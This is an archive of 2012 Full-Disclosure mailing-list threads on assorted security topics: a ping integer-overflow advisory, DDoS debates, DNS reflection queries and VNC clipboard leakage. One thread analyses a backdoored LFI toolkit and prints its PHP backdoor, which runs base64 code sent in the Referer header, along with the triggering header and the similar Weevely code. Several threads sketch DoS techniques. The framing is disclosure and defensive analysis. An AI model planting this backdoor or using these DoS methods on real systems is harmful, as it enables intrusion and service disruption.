The best you could do without internet access to store the keys is to implement a strong crypting method on the app itself and use every trick you can that would piss off a reverse engineer. On Apr 9, 2012 2:26 PM, Erki Männiste erki.manni...@webmedia.ee wrote: I am developing a software that is going to be distributed to end-users on usb sticks. The application and the content will be stored on that device and the content will be stored in a one-file sqlCE database, it will be crypted by default and will be encrypted by the application on-the-fly. My client has made it clear, that he wants to keep end-users from copying the content and using it on any other device but that very stick. Now, due to the offline requirement this is impossible to achive because i have to store the encryption key somewhere in the code and users are able to access the data while in unencrypted state. Can anybody recommend me any mechanism that i could apply, to make it more difficult for users to copy the content? ERKI Securing Apache Web Server with thawte Digital Certificate In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates. http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Working to get more people to check if their infected with DNS Changer
You forget that the culprits have already been caught, no one is there in order to issue an update to circumvent the check site. On Apr 4, 2012 9:55 AM, demonsdeba...@gmail.com wrote: I see a hole in the Check this site to test your DNS. DNS spoofing attacker would change NS,A or MX record for a certain, targeted site, like Facebook. If you don't use DNSSecs or don't monitor (IDS/IPS) your DNS traffic I just don't see how checking a certain site DNS mapping would expose malware infection? Securing Apache Web Server with thawte Digital Certificate In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates. http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [iputils] Integer overflow in iputils ping/ping6 tools
Shoulda gotten a lawyer o.O professor sex scandals can rake in decent money On Mar 13, 2012 4:32 PM, Jeffrey Walton noloa...@gmail.com wrote: On Tue, Mar 13, 2012 at 6:17 PM, Marcus Meissner meiss...@suse.de wrote: Hi, How is this different from writing a fork bomb? :) Fork bombs can be remediated with RLIMIT_NPROC. The runaway ping program needs to be fixed and then recompiled. I suppose you could say the same about runaway fork'd programs, though. I had one accidentally get away from me in college. The professor who performed the post-mortem was very impressive. He had me fingered in under an hour. Jeff On Tue, Mar 13, 2012 at 09:42:29AM +0100, Christophe Alladoum wrote: [ Description ] An integer overflow was found in iputils/ping_common.c main_loop() function which could lead to excessive CPU usage when triggered (could lead to DoS). This means that both ping and ping6 are vulnerable. [ Proof-Of-Concept ] Specify big interval (-i option) for ping/ping6 tool: {{{ $ ping -i 3600 google.com PING google.com (173.194.66.102) 56(84) bytes of data. 64 bytes from we-in-f102.1e100.net (173.194.66.102): icmp_req=1 ttl=50 time=11.4 ms [...] }}} And check your CPU usage (top, htop, etc.) [ Explanation ] Here, ping will loop in main_loop() loop in this section of code : {{{ /* from iputils-s20101006 source */ /* ping_common.c */ 546 void main_loop(int icmp_sock, __u8 *packet, int packlen) 547 { [...] 559 for (;;) { [...] 572 do { 573 next = pinger(); 574 next = schedule_exit(next); 575 } while (next = 0); [...] 588 if ((options (F_ADAPTIVE|F_FLOOD_POLL)) || nextSCHINT(interval)) { [...] 593 if (1000*next = 100/(int)HZ) { }}} If interval parameter (-i) is set, then condition L593 will overflow (ie. value exceeding sizeof(signed integer)), making this statement always true for big values (e.g. -i 3600). As a consequence, ping process will start looping actively as long as condition is true (could be pretty long). As far as looked, this bug is unlikely to be exploitable besides provoking Denial-Of-Service. [ Affected versions ] Tested on Fedora/Debian/Gentoo Linux system (2.6.x x86_32 and x86_64) on iputils version 20101006. ping6 seems also to be affected since it's relying on same ping_common.c functions. Since iputils is not maintained any longer (http://www.spinics.net/lists/netdev/msg191346.html), patch must be applied from source. [ Patch ] Quick'n dirty patch (full patch in appendix) is to cast test result as long long: {{{ 593 if (((long long)1000*next) = (long long)100/(int)HZ) { }}} [ Credits ] * Christophe Alladoum (HSC) * Romain Coltel (HSC) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Analysis of the r00t 4 LFI Toolkit
Uhh no, you misread what he said. He's saying he's seen that code in a few php shells that were supposedly meant to be private but the authors were miserable failures and he found the code anyways, not that he wrote it. On Feb 20, 2012 12:36 AM, Manu sourvi...@gmail.com wrote: But you saw it in a few priv8 php shells? And you say that is your code as 'r00t 4 LFI toolkit' ? Pathetic 2012/2/19 InterN0T Advisories advisor...@intern0t.net Thank you for the response, I didn't know it was included in the Weevely tool, but I did see it used in a few priv8 PHP shells too. On Sun, 19 Feb 2012 19:32:13 +0200, Anestis Bechtsoudis bechtsoudi...@gmail.com wrote: The backdoor PHP code that you included is exactly the same as generated by Weevely [1] tool, until the 0.4 version of the tool. For convenience I include the base64 decoded Weevely code here too: ini_set('error_log','/dev/null'); parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='my' count($a)==9) {echo 'pass';eval(base64_decode(str_replace( , +, join(array_slice($a,count($a)-3);echo '/pass';} For more details you can refer at a relevant post I wrote recently [2]. I haven't dig into r00t 4 LFI source code, but from your analysis the similarities are pretty obvious. ps: This email has been BCC'ed to Weevely developer. [1] http://code.google.com/p/weevely/ [2] https://bechtsoudis.com/security/put-weevely-on-the-your-nids-radar/ On 02/19/2012 07:01 PM, InterN0T Advisories wrote: Dear Full Disclosure readers, Today I saw Joe McCray among others, tweet about the (new) r00t 4 LFI Toolkit, that according to its description: --- This tool is a php script that assists in performing local file inclusion attacks. --- Should be able to perform local file inclusion attacks. -:: Overview ::- After studying this tool for a brief 5 minutes, it was obvious that it was nowhere what I hoped it to be, as the tool only use one method, the /proc/self/environ vector (as seen on e.g., the intern0t forums and many other sites). The tool is therefore, not capable of performing attacks, but only 1, single type of LFI attack. (Note that the 'S' has been removed.) The method this tool uses, is far from new and doesn't always work either, but it's a nice trick that e.g., SirGod wrote about on the intern0t forums in 2009. (This tool was released the 18th February 2012.) -:: Vulnerabilities ::- Further study of this tool reveals: - None of the output from the tool is sanitized, meaning the attacker using the script, can get XSS'd (and CSRF'd), if the target has changed e.g., the 'uname -a' command (which is relatively simple to do), to include (print) JavaScript instead. If this happens, the attacker may end up attacking himself, crashing or something third, depending on the type of XSS payload. - The most interesting part, is on line 92, where the developer (KedAns-Dz), has decided to backdoor the tool. -:: The Backdoor ::- Analysis of the backdoor: By sending a HTTP request, that includes a specially crafted referer, it is possible to execute PHP code: --- Referer: a1=iza2=a3=a4=a5=a6=a7=a8=a0=cGhwaW5mbygpOw== --- This referer will make the script execute: phpinfo(); -:: Code Review ::- The code that enables the developer to use the script as a backdoor looks like the following: --- parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' count($a)==9) { echo 'star';eval(base64_decode(str_replace( , +, join(array_slice($a,count($a)-3);echo '/star';} --- It certainly took a little bit of study to trigger, but in essence here's what it do: 1. Parse the HTTP Referer string into variable: $a (Referer: is not included.) 2. If the first array value (not key / arg), is a string named: iz 3. And if there's 9 (different) arrays, then 4. Print out the contents of.. This requires a bit more in-depth explanation: A) Evaluate the following as PHP code: B) Base64_decode the input: C) Replace (space) with + (plus), in case they occur. D) Use the last three array values from the HTTP referer. (You don't have to use all three, using the last will work fine.) To make it all a lot more simple: --- Referer:Array1=izArray2=Array3=Array4=Array5=Array6=Array7=Array8=Array0=[BASE64 Code that will be executed as PHP.] --- Screenshot: http://i.imgur.com/PXcSX.png References: http://forum.intern0t.org/offensive-guides-information/4113-analysis-r00t-4-local-file-inclusion-toolkit.html
Re: [Full-disclosure] Arbitrary DDoS PoC
If the design is broken than the implementation is broken. Have you READ your own source code? Do you understand what its actually doing? Rhetorical questions of course but still. Your poc calls curl multiple times via a list of proxies. No more, no less. If you are going to claim that such a thing is an effective general technique YOU have to back up that claim, not me or anyone else on this list. I never bothered running it because anyone who read that simple python code(which was a good thing its simple), can understand what it is doing, and do a mental comparison to what they previously knew about the subject of dos. Your poc does not demonstrate anything new, it demonstrates existing knowledge that is generally known to not be an effective method for dosing for all the reasons I explained in my previous mails. I think its quite pedantic of you to only criticize me for calling out the ineffectiveness of your poc. You did not address anything I or anyone else said about your claim. If you think I am wrong or mistaken in my personal assessment of your claim than you are the one who must show how and why to defend your claim. Belittling someone who criticizes you is not professional, not productive, does not give strength to your claim, and does not make you right. The end of the line is I don't care what you claim your code does, I care about what the code does, and your code is not an effective general technique for denial of service attacks. On Feb 13, 2012 8:48 PM, Lucas Fernando Amorim lf.amo...@yahoo.com.br wrote: ** I could argue that an attack targeted at a service, especially HTTP, is not measured by the band, but the requests, especially the heavier, could argue that a technique is the most inherent characteristic of multiple sources of traffic and still relying on trust. I could still say that is an implementation that relates only to say - Look, it exists!, I could still prolong explaining about overheads, and using about the same time many sites that make the requests, thus reducing the wake of a failure, even if you say easily diagnosable. But I'd rather say that it is actually very pedantic of you label something as inefficient, especially when not done a single test, only the pedantic observation of someone whose interests it is reprehensible. I will not say you're one of those, but this is really an attitude typical of this kind, which is certainly not a hacker. Thanks to people like that, do not know if you like, there are many flaws yet to be explored. If anyone wants more information, obviously I will ask to send an email or call me to give a presentation, I will not think about anything. My goal in was invited researchers to study DDoS on this model, because anytime someone can direct thousands to generate a network congestion. On 13-02-2012 11:17, Gage Bystrom wrote: Uhh...looks pretty standard boss. You aren't going to DoS a halfway decent server with that using a single box. Sending your request through multiple proxies does not magically increase the resource usage of the target, its still your output power vs their input pipe. Sure it gives a slight boost in anonymity and obfuscation but does not actually increase effectiveness. It would even decrease effectiveness because you bear the burden of having to send to a proxy, giving them ample time to recover from a given request. Even if you look at it as a tactic to bypass blacklisting, you still aren't going to overwhelm the server. That means you need more pawns to do your bidding. This creates a bit of a problem however as then all your slaves are running through a limited selection of proxies, reducing the amount of threats the server needs to blacklist. The circumvention is quite obvious, which is to not utilize proxies for the pawnsand rely on shear numbers and/or superior resource exhaustion methods On Feb 13, 2012 4:37 AM, Lucas Fernando Amorim lf.amo...@yahoo.com.br wrote: With the recent wave of DDoS, a concern that was not taken is the model where the zombies were not compromised by a Trojan. In the standard modeling of DDoS attack, the machines are purchased, usually in a VPS, or are obtained through Trojans, thus forming a botnet. But the arbitrary shape doesn't need acquire a collection of computers. Programs, servers and protocols are used to arbitrarily make requests on the target. P2P programs are especially vulnerable, DNS, internet proxies, and many sites that make requests of user like Facebook or W3C, also are. Precisely I made a proof-of-concept script of 60 lines hitting most of HTTP servers on the Internet, even if they have protections likely mod_security, mod_evasive. This can be found on this link [1] at GitHub. The solution of the problem depends only on the reformulation of protocols and limitations on the number of concurrent requests and totals by proxies and programs for a given site, when exceeded returning a cached copy
Re: [Full-disclosure] Arbitrary DDoS PoC
Uhh...looks pretty standard boss. You aren't going to DoS a halfway decent server with that using a single box. Sending your request through multiple proxies does not magically increase the resource usage of the target, its still your output power vs their input pipe. Sure it gives a slight boost in anonymity and obfuscation but does not actually increase effectiveness. It would even decrease effectiveness because you bear the burden of having to send to a proxy, giving them ample time to recover from a given request. Even if you look at it as a tactic to bypass blacklisting, you still aren't going to overwhelm the server. That means you need more pawns to do your bidding. This creates a bit of a problem however as then all your slaves are running through a limited selection of proxies, reducing the amount of threats the server needs to blacklist. The circumvention is quite obvious, which is to not utilize proxies for the pawnsand rely on shear numbers and/or superior resource exhaustion methods On Feb 13, 2012 4:37 AM, Lucas Fernando Amorim lf.amo...@yahoo.com.br wrote: With the recent wave of DDoS, a concern that was not taken is the model where the zombies were not compromised by a Trojan. In the standard modeling of DDoS attack, the machines are purchased, usually in a VPS, or are obtained through Trojans, thus forming a botnet. But the arbitrary shape doesn't need acquire a collection of computers. Programs, servers and protocols are used to arbitrarily make requests on the target. P2P programs are especially vulnerable, DNS, internet proxies, and many sites that make requests of user like Facebook or W3C, also are. Precisely I made a proof-of-concept script of 60 lines hitting most of HTTP servers on the Internet, even if they have protections likely mod_security, mod_evasive. This can be found on this link [1] at GitHub. The solution of the problem depends only on the reformulation of protocols and limitations on the number of concurrent requests and totals by proxies and programs for a given site, when exceeded returning a cached copy of the last request. [1] https://github.com/lfamorim/barrelroll Cheers, Lucas Fernando Amorim http://twitter.com/lfamorim ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Arbitrary DDoS PoC
Absolutely and that's partly my point. The methods you describe are neigh exactly how modern general ddos techniques work, which is not how this works. One problem is you can't use Facebook or Google as an open proxy like you're saying because 1.) It assumes you can force Google or Facebook to make multiple requests for just one of your requests, else you are still being stuck to how much you can output vs how much they can take. Just because you can tweak how much you can send does not change the basic principal behind this and 2.) It no longer becomes a general method because you must abuse a particular flaw in a particular service to get it to use its resources to flood the targets resources. Not trying to really argue your examples, I'm just saying his script and his bug report or whatever you call it is terribly ineffective as a general method compared to pretty standard techniques like you described, and does not abuse any implementation or protocol to be a specific flaw a la the Apache dos bug a few months ago. It's like he's claiming he found the new smurf attack when all the attack is a script calling curl through a proxy, torrenting the latest distro install disk is a bigger DoS technique than this. On Feb 13, 2012 5:48 AM, adam a...@papsy.net wrote: I have to admit that I've only read the posts here, haven't actually followed the link, but in response to Gage: It entirely depends on how it's being done, specifically: what services/applications are being targeted and in what way. If he's proxying through big servers such as those owned by Facebook, Google, Wikipedia, etc: then it definitely does make a difference. You're assuming that his network speed would be the bottleneck, but to make that assumption, you first have to assume that he's actually waiting around for response data. Maybe it's too early to convey this in an understandable way, I don't know. An example scenario that would be effective though: imagine that you run a web server, also imagine that there's a resource (CPU/bandwidth) intensive script/page on that server. For the sake of discussion, let's assume that my home internet speed is 1/10 of your server. We can also probably assume that your server's network speed is 1/10 of Google's. If I can force Google's server to request that page, that automatically puts me at an advantage (especially if I close the connection before Google can send the response back to me). Even if you're correct about his particular script, the logic behind your response is flawed. In the above example, one could use multithreading to cycle requests to your server through Google, Facebook, Wikipedia, whoever. As soon as the request has been sent, the connection could be terminated. If that for some reason wouldn't work, the script could wait until one byte is received (e.g. the 2 in 200 OK) and close the connection then. At that point, the bandwidth/resources would have already been used. The bottom line is that you could easily use the above concepts (and likely what the OP has designed) to overpower a server/service while using very little resources of your own. It's all circumstantial anyway though. My overall point, specifics aside, is that being able to use Google or Facebook's resources against a target is definitely beneficial and has all kinds of advantages. On Mon, Feb 13, 2012 at 7:17 AM, Gage Bystrom themadichi...@gmail.comwrote: Uhh...looks pretty standard boss. You aren't going to DoS a halfway decent server with that using a single box. Sending your request through multiple proxies does not magically increase the resource usage of the target, its still your output power vs their input pipe. Sure it gives a slight boost in anonymity and obfuscation but does not actually increase effectiveness. It would even decrease effectiveness because you bear the burden of having to send to a proxy, giving them ample time to recover from a given request. Even if you look at it as a tactic to bypass blacklisting, you still aren't going to overwhelm the server. That means you need more pawns to do your bidding. This creates a bit of a problem however as then all your slaves are running through a limited selection of proxies, reducing the amount of threats the server needs to blacklist. The circumvention is quite obvious, which is to not utilize proxies for the pawnsand rely on shear numbers and/or superior resource exhaustion methods On Feb 13, 2012 4:37 AM, Lucas Fernando Amorim lf.amo...@yahoo.com.br wrote: With the recent wave of DDoS, a concern that was not taken is the model where the zombies were not compromised by a Trojan. In the standard modeling of DDoS attack, the machines are purchased, usually in a VPS, or are obtained through Trojans, thus forming a botnet. But the arbitrary shape doesn't need acquire a collection of computers. Programs, servers and protocols are used to arbitrarily make requests on the target. P2P
Re: [Full-disclosure] Chat Embeds -- How Evil Are They???
This seemed amusing at first, right up until you 'take over' the chatroom by clicking make owner from a staff name . ill give you the benefit of the doubt that the example could have just been exectuted badly On Feb 2, 2012 1:04 AM, Stefan Jon Silverman s...@sjsinc.com wrote: Folks: An interesting subject that I have never seen discussed here but one I want to put on the table Apparently Xat (as a chat embed) has so many holes in it that a brick of Swiss cheese would be jealous..a room I have there on one of my websites ended up w/ Superman sheets wallpaper when I clicked on a chatters house icon from my room owners account and also managed to change my management password denying me access to those capabilities until I reset (my cookie functions from w/in chat box remained active)... There is a cute vid demonstrating how to take over a chat room at -- http://www.youtube.com/watch?v=wHcRLolT7Z8 I have also found similar ills in other chat embeds like Chatango, etc Talk among yourselves now -- Regards, Stefan ** *Stefan Jon Silverman*http://www.sjsinc.com/cgi-bin/DoRedirect?sig-google- Founder / President SJS Associates, N.A., Inc. A Technology Strategy Consultancy ** Cell *917 929 1668* *s...@sjsinc.com*s...@sjsinc.com eMail *www.sjsinc.com*http://www.sjsinc.com/?%20eMail%20Sig ** Aim: *LazloInSF* Msn: *LazloInSF* Yahoo: *sjs_sf* ** Weebles wobble but they don't fall down ** ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploit Pack - New video - Ultimate 2.1
Not to mention he was originally accused of stealing code from the metasploit base without atribution. That and multiple risky signs on his first website and such. It truly is a wonder that no one has dropped him in a zine or anything like that. Blackhats read FD just as much as the professionals, and both sides of the fence doesn't like this guy. I blame the fact that getting a version of frontpage that old to run on a modern x64 box is neigh impossible and ergo, extremely hard for the average shmoe to dev an exploit for that known vulnerable version. I respect his hoster who managed to do so. Respect in a macabre fascination sort of way. On Jan 31, 2012 10:35 AM, Nate Theis ntth...@gmail.com wrote: He's a security searcher: he searches exploit-db to find PoCs to steal. On Jan 30, 2012 2:25 AM, Mario Vilas mvi...@gmail.com wrote: I fear the day when he finally succeeds in making enough people believe he's a real security researcher. I wish attrition.org did a piece on him in the charlatans section. 2012/1/30 Peter Osterberg j...@vel.nu: This is Juan Sacco's new spam puppet. He just posted the same thing using his real name elsewhere. nore...@exploitpack.com skrev: Exploit Pack - New video! Release - Ultimate 2.1 Check it out! http://www.youtube.com/watch?v=4TrsFry13TU Exploit Pack Team http://exploitpack.com Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DNS bind attacks
Other than the fact they may somehow notice this and start trying to autoban sites you should be fine. Since he is spoofing it would be hard for him to tell without trying it out on a box he controls. If anything gets autobanned you really need then just whitelist it, if you can think of such places before hand then go ahead and whitelist them now. Just be aware in case its not a ddos but really part of some exploit of sorts, as owning a bind server is obviously very appealing. Now if any would be a good time to do a double check on your security measures but in all likelihood it seems like a fairly weak attack and your measures should be fine. That or we are both missing some glaring piece of information. On Jan 26, 2012 3:36 AM, J. von Balzac jhm.bal...@gmail.com wrote: I'm seeing a lot of hosts in my named logs (I mean log files, it's not like I am naming my poop) ...ok... silly joke hehe So anyway, named bind is reporting a lot of denied queries of type 'isc.org/ANY/IN'. I'm not looking for a solution - I have one (which is to immediately block the IPs for port 53 after as few as one denied query) - but I want to warn server admins who haven't spotted both these queries and other denied queries. Common sense suggests that these hosts are probably spoofed IPs. Looks like an effective way to ddos a host: request an arbitrary DNS record with a spoofed IP and let the server reply to the spoofed IP in whatever way. Do that with many hosts and there is your denial of service. A side effect is that when you block the IP, you're blocking something that isn't really doing anything wrong as it's a spoofed IP But ok, I'm not too sure of this so please shoot holes in my theory or suggest better fixes/workarounds/... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
What was the offlist message he was referring to? Cause yeah, he sounds pretty new here with that kind of message. People bring in outside conversations all the time, especially if they feel it is relevant to the topic at hand. Speaking of the topic at hand: I agree with the crowd that says it is not explicitly a security bug, but more like a lack of a good feature. It should be off by default, and someone on the list already made a patch to remove the clipboard which you shouldn't be using for sensitive information while connected to untrustworthy computers anyways. The developers should be notified that they need the feature to turn clipboard sharing off, but if they don't choose a different vnc and be on your way. I don't view it as a security bug because its policy bug. It's not something where this problem exists ergo I can exploit it, its a problem where if they do something stupid, I can take advantage of it, and oh hey their client by default doesn't mitigate this. And before someone yells at me for how I seperate software bugs and policy bugs by pointing out something like a client side attack: I view such things as a mix. Policy bug that they are falling for it, and software bug for the actual exploit. And really this is a good example of a situation where if you are worried about this you have bigger problems. Why must you use vnc? Why is what you're connecting to untrustworthy? What information is directly at risk if the box you're connecting to is compromised? What information is indirectly at risk? Does the box running suspicious programs have access to the internet? Etc. Once you start going down the list on things that should be done, the need to worry about this kind of bug becomes less and less relevant. Meaning if this kind of problem IS relevant then I would almost bet money that you are doing other things really wrong and so an attacker or a bad app doesn't need to use this because they got far more easier and more rewarding things to try. On Jan 25, 2012 9:45 AM, coderman coder...@gmail.com wrote: On Wed, Jan 25, 2012 at 2:55 AM, Ben Bucksch n...@bucksch.org wrote: Dear coderman, posting mails that were explicitly marked offlist on the public list is no-go. you must be new around here... why not let everyone learn from your fail? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Facebook seems to think my Arch Linux box has malware on it
Yeah good luck with reproducing it cause it REALLY sounds like a mitm or a phishing attack trying to get people to download fake av. I would do a dns lookup and then compare those results to that of a public web service, and save the links for the AVs to check if they have any malicious history associated with them. On Jan 20, 2012 1:21 PM, Wesley Kerfoot wja...@gmail.com wrote: It turns out that it was a problem with firefox. However, I do not believe I had any malicious addons or extensions for a few reasons. 1) I only had 4 extensions, adblock plus, pentadactyl, firebug, and noscript. 2) they were all vetted (presumably) by mozilla. I believe, and this is simply speculation, that the problem may have been caused by noscript stopping/interfering with some scripts on facebook. Facebook would assume it was malware interfering with the site, and attempt to block it. I am 99% sure my browser was not really compromised. I'm going to try and reproduce it later. On 19 January 2012 22:57, Byron Sonne byron.so...@gmail.com wrote: Hello, “Your computer has malware!” Facebook says to me. I am really curious to know, assuming that everything you've said is accurate, how they determine you've got malware. This is rather curious. The more I think about it, the more I wonder if something's come between you and facebook pretending to be official, hoping to trick you into downloading something. Cheers -- freebyron.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Facebook seems to think my Arch Linux box has malware on it
What the hell are you talking about? I was just giving some advice on how he could check if it was legit or not if it happens again. What crawled up your ass and died this morning? On Jan 20, 2012 2:21 PM, ja...@zero-internet.org.uk wrote: You should tell us what you would have done had you been on one of the hijacked sept 11 planes. Bet things would have gone down different then, amiright? Sent from my BlackBerry® wireless device -Original Message- From: Gage Bystrom themadichi...@gmail.com Sender: full-disclosure-boun...@lists.grok.org.uk Date: Fri, 20 Jan 2012 13:29:01 To: Wesley Kerfootwja...@gmail.com; full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Facebook seems to think my Arch Linux box has malware on it ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Facebook seems to think my Arch Linux box has malware on it
Well I apologize if you consider a 'dns lookup' to be a buzz word. I also apologize if you are incapable of understanding intent without it being spelled out for you that I was stating what I would do if I had seen that and I suggest he do something similar. What's your problem with me being specific instead of being vague about the steps? The difference between your idiotic Hollywood script and what I actually said is that I put an ounce of thought into mine. If you have a problem with that I said then explain what's wrong with it instead of going about with an ad hominem fallacy. Speaking of contribution what the hell are you contributing with all of this? I gave some 'trite advice' as to what he could do and I framed it as what I would have done. What's so bad about that? If you can do nothing but bitch about how my advice and my phrasing makes me a horrible person than you might as well move on. I certainly know that's what I intend to do. Oh wait, you have a problem with people stating what they would do in a given situation, I'm sorry. I'll try to be more considerate next time. On Jan 20, 2012 3:10 PM, James Condron ja...@zero-internet.org.uk wrote: Yeah, you really weren't, you were telling us how you would have handled it, with all the buzzwords and terms you could have thought of. Hell, I'm surprised you didn't manage to get the word 'synergy' in there. I would do a dns lookup and then compare those results to that of a public web service, and save the links for the AVs to check if they have any malicious history associated with them. Reads like s bad Hollywood script First I would ping the phone number and see if I could telnet to the ICMP, then get the PTR of the MAC address and use an ARP overflow and spoof the TTL of the Window Size and... (etc. etc.) What are you suggesting; take a look at where the request is coming from and make a decision based on that whether the software is being punted by facebook or a third party? Fine- just say that; make your suggestion and get on with your life. Its a little trite as advice goes, but if thats all you can contribute then go for it. Coming in with your Marky-Mark talk of First I'd get the first hijacker and use his head to kill the second hijacker and then I'd be all like 'yeah, lets land the plane here- let me drive' is not very helpful On 20 Jan 2012, at 22:37, Gage Bystrom wrote: What the hell are you talking about? I was just giving some advice on how he could check if it was legit or not if it happens again. What crawled up your ass and died this morning? On Jan 20, 2012 2:21 PM, ja...@zero-internet.org.uk wrote: You should tell us what you would have done had you been on one of the hijacked sept 11 planes. Bet things would have gone down different then, amiright? Sent from my BlackBerry® wireless device -Original Message- From: Gage Bystrom themadichi...@gmail.com Sender: full-disclosure-boun...@lists.grok.org.uk Date: Fri, 20 Jan 2012 13:29:01 To: Wesley Kerfootwja...@gmail.com; full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Facebook seems to think my Arch Linux box has malware on it ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Rate Stratfor's Incident Response
Exactly. People are mostly being ridiculous atm. If they told you about a vuln and did not take advantage of it they are innocent. By all means you have the right to investigate and make sure they didn't do anything else, but if they didn't they are innocent. The moment they take advantage of a vuln to door you, steal important system files, or steal confidential information they are guilty. Accidentally finding a document is not a crime either. I really hate physical analogies but I think this one is relevant: It would be like if someone found your wallet and saw your credit card, ssn card(which you shouldn't carry with you), and your drivers license, and then found you to give it back. If they didn't do anything with it they are fine. People need to realize that the internet is the modern wild west. You only trust strangers enough to do business with them. You can't expect strangers to immediately understand your way of doing things. Real law enforcement only gets involved if something big happens. Attackers are the modern bandits from the lowly script kiddie to the billy the kids running around. You hire your sheriff because he's the best shot around. Why are people saying that the sharpshooters of this day shouldn't become sherrifs just because of prior activities? Of course you're not going to hire the guy that shot up your joint, but what real reason do you have to not hire the guy that shot up other places? A good shots a good shot and if he's willing to come clean then hand him the soap. Yeah I believe we shouldn't be hiring script kiddies, but we shouldn't discriminate against where people honed their skills. Especially something like security where they had to have their skills down on a day to day basis where it really counts. As for people complaining about them not knowing how to secure things ethics, etc: well you have a very poor knowledge of the underground hackers psychology. I've spent my share of time observing the underground, talking amongst others out of curiosity. They have more ethics than most day to day people. The good ones, the ones you'd want to hire KNOW how to secure stuff. Why? Well the secure one is easy: they don't want to get pwned, and they don't want their targets to get pwned by other people. They have to know how to be defensive or they lose their trophies. The ones that don't learn eventually that need to start learning. The ethics claim may seem strange but consider this: this is a society of sorts where everyone works together to expose fradulant vendors so they don't get scammed, no legit person screws over their clients and clients don't screw over vendors because the only business license is your reputation. And its a well understood rule that is pounded into newbs that you don't fuck up your own workplace. They make it clear that its too risky and that it'd be the same as screwing over your clients. You may not trust these people, but that's because you don't understand what they value, how they build a trust amongst themselves and more importantly you don't know how to build trust with them. No wonder its surprising if your company gets pwned cause you don't remotely try to understand the ones really doing the damage. You don't talk to them, ask them questions, you don't share interesting knowledge with them. You are being an antithesis to everything they value and not bothering to see if you should be against some of those values. On Jan 13, 2012 12:04 PM, Laurelai laure...@oneechan.org wrote: On 1/13/12 1:24 PM, Paul Schmehl wrote: --On January 13, 2012 12:03:22 PM -0500 Benjamin Kreuter ben.kreu...@gmail.com wrote: On Fri, 13 Jan 2012 10:37:31 -0600 Paul 